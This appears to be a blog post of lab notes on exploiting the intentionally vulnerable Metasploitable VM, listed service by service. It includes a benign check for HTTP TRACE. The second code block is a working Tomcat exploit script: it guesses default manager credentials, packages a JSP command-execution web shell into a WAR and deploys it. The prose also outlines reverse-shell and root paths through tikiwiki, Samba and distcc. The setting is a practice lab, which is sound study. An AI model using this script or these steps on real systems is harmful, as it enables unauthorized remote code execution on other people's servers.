metasploitable exploits

Metasploit ship a test VM they call "Metasploitable", which can be downloaded and used to try out Metasploit. I recommend using the BackTrack VM image to do this, as it's easier than installing Metasploit yourself and it comes with lots of other useful tools.

However I couldn't find a comprehensive list of the vulnerabilities that can be exploited, so here are my notes. I've tried not to give too much away, but of course this is going to be a partial spoiler, so see what you can find for yourself before cross-checking against my list.


21/tcp open ftp ProFTPD 1.3.1
# Not a vulnerable version; still an obvious security risk because logins could be brute forced.

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
# Again no specific vulnerability found, but logins could be brute forced.

23/tcp open telnet Linux telnetd
# Again no specific vulnerability found, but logins could be brute forced.

25/tcp open smtp Postfix smtpd
# No specific vulnerability found, but it doesn't require authentication, so it could be used for social engineering attacks.

53/tcp open domain ISC BIND 9.4.2
# Not a vulnerable version

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
# Not a vulnerable Apache version
# multiple PHP applications run on this port
# directory listing is enabled on multiple paths
# HTTP TRACE is enabled, which makes the server usable for cross-site tracing (XST) attacks

## Web Apps ##
# phpinfo.php - serious information disclosure, and may also have vulnerabilities of its own
# twiki - multiple vulnerabilities. Can be used to list files and run shell commands. Should also have upload-and-include vulnerabilities, although I haven't tried it.
# tikiwiki - multiple vulnerabilities,
# one lets the db connection details be extracted remotely. Get the admin password from the db and you can then upload a reverse-shell PHP script.
# The shell runs with the permissions of the webserver.
# The other is a buffer overflow and allows a "Meterpreter" payload to be deployed, giving root access, which is very cool.
# cgi-bin - is empty, which is a shame, but could be used to place a remote shell into.
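A quick way to confirm the TRACE finding on port 80 above without a browser. This is an added example, not code from the original post: it sends a TRACE request carrying a marker header and only reports the method as enabled when the server answers 200 with a message/http body that echoes that marker back, which is exactly what a cross-site tracing attack relies on. The lab address and the two canned responses used for the offline check are constructed.

```python
import socket

MARKER = "xst-probe"


def build_trace_request(host: str, path: str = "/", marker: str = MARKER) -> bytes:
    # A custom header is included so reflection is unambiguous: if the marker
    # comes back in the body, the server echoed our request headers verbatim.
    return (
        f"TRACE {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"X-Probe: {marker}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def trace_is_enabled(response: bytes, marker: str = MARKER) -> bool:
    head, _, body = response.partition(b"\r\n\r\n")
    status = head.split(b"\r\n", 1)[0].split()
    if len(status) < 2 or status[1] != b"200":
        return False  # 405/501 (or anything but 200) means TRACE is refused
    # Apache answers an allowed TRACE with Content-Type: message/http and echoes
    # the request, headers included; require both before calling it enabled.
    return b"message/http" in head.lower() and marker.encode() in body


def check_trace(host: str, port: int = 80, timeout: float = 5.0) -> bool:
    # Live check against a target; returns True when TRACE is reflected.
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_trace_request(host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return trace_is_enabled(b"".join(chunks))


# Constructed responses for offline checking (not captured from a real host).
ENABLED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\nConnection: close\r\n\r\n"
    b"TRACE / HTTP/1.1\r\nHost: target\r\nX-Probe: xst-probe\r\nConnection: close\r\n\r\n"
)
DISABLED_RESPONSE = (
    b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET,HEAD,POST,OPTIONS\r\n"
    b"Content-Type: text/html\r\n\r\n<html>TRACE not allowed</html>"
)

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.101"  # hypothetical lab address
    print("TRACE enabled:", check_trace(target))
```

The fix on the Apache side is `TraceEnable off` in the server config; re-running the check afterwards should turn the 200 into a 405.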

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
# Definitely vulnerable, possibly to multiple remote buffer overflows. A remote user can trivially gain a shell.

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
# Not linked to above

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
# Not a vulnerable version; still an obvious security risk because logins could be brute forced.
# Contains the data for the twiki and tikiwiki services on port 80

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
# Not a vulnerable version; still an obvious security risk because logins could be brute forced.

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
# I couldn't find any exploits for this; AJP is normally associated with Tomcat connectors.

8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
# The password can be found using Metasploit's default user and password scan.
# There is then a Metasploit module to upload a JSP remote shell;
# the shell has webserver permissions.
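The two Tomcat steps above (guess the manager login, then push a JSP shell through the manager) done by hand, as an added example that is not part of the original post; Metasploit's tomcat_mgr_login and tomcat_mgr_deploy modules do the same thing. It assumes a Tomcat 5.x/6.x manager that accepts a WAR as the body of `PUT /manager/deploy?path=/name`. The credential list, the lab URL and the `simulated_manager` stand-in used for the offline run are constructed.

```python
import base64
import io
import urllib.error
import urllib.request
import zipfile

# Constructed list of common Tomcat manager defaults (not taken from the post).
DEFAULT_CREDS = [
    ("tomcat", "tomcat"), ("admin", "admin"), ("admin", ""),
    ("manager", "manager"), ("tomcat", "s3cret"), ("role1", "role1"),
]


def basic_auth_header(user: str, password: str) -> dict:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": "Basic " + token}


def http_call(url, method="GET", user="", password="", body=None):
    # Returns (status, body). urllib raises on 4xx/5xx, so unwrap HTTPError too.
    req = urllib.request.Request(url, data=body, method=method,
                                 headers=basic_auth_header(user, password))
    if body is not None:
        req.add_header("Content-Type", "application/octet-stream")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.getcode(), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def find_manager_creds(base_url, candidates=DEFAULT_CREDS, call=http_call):
    # The manager answers 401 until a valid pair is offered, then 200.
    # `call` is injectable so the loop can be exercised without a live Tomcat.
    for user, password in candidates:
        status, _ = call(f"{base_url}/manager/html", user=user, password=password)
        if status == 200:
            return user, password
    return None


# Minimal JSP that runs ?cmd=... and returns its stdout (the "JSP remote shell").
JSP_SHELL = r'''<%@ page import="java.io.*" %><%
String cmd = request.getParameter("cmd");
if (cmd != null) {
  Process p = Runtime.getRuntime().exec(cmd);
  BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
  String line;
  while ((line = r.readLine()) != null) { out.println(line); }
}
%>'''


def build_war(jsp_source=JSP_SHELL, jsp_name="cmd.jsp") -> bytes:
    # A WAR is just a zip; a minimal WEB-INF/web.xml keeps older Tomcats happy.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml",
                     '<?xml version="1.0" encoding="UTF-8"?>\n'
                     '<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4"/>\n')
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> list:
    return zipfile.ZipFile(io.BytesIO(war_bytes)).namelist()


def deploy_war(base_url, user, password, app_path, war_bytes, call=http_call) -> bool:
    # The manager answers a successful deploy with 200 and a text body that
    # starts "OK - Deployed application at context path ..."; "FAIL - ..." otherwise.
    status, body = call(f"{base_url}/manager/deploy?path=/{app_path}", method="PUT",
                        user=user, password=password, body=war_bytes)
    return status == 200 and body.startswith(b"OK")


def simulated_manager(url, method="GET", user="", password="", body=None):
    # Constructed stand-in for a manager that only accepts tomcat/tomcat, so the
    # flow above can be run offline. Not a capture from a real Tomcat.
    if (user, password) != ("tomcat", "tomcat"):
        return 401, b"Unauthorized"
    if url.endswith("/manager/html") and method == "GET":
        return 200, b"<html>Tomcat Web Application Manager</html>"
    if "/manager/deploy?path=" in url and method == "PUT" and body:
        return 200, b"OK - Deployed application at context path " + url.rsplit("=", 1)[1].encode()
    return 404, b"FAIL - Unknown command"


if __name__ == "__main__":
    import sys
    base = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.56.101:8180"  # hypothetical lab target
    creds = find_manager_creds(base)
    print("manager creds:", creds)
    if creds and deploy_war(base, *creds, "cmd", build_war()):
        print(f"shell deployed: {base}/cmd/cmd.jsp?cmd=id")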

3632/tcp distcc (Metasploit module distcc_exec)
# can run remote commands as root


I've since realised that some of this information is in the readme file in the Metasploitable download, but my post is more detailed, so I'll leave it up.

Inferring from the readme file, it doesn't appear that I've missed anything. There is a todo in the readme to change the ProFTPD and Postfix apps to different versions.
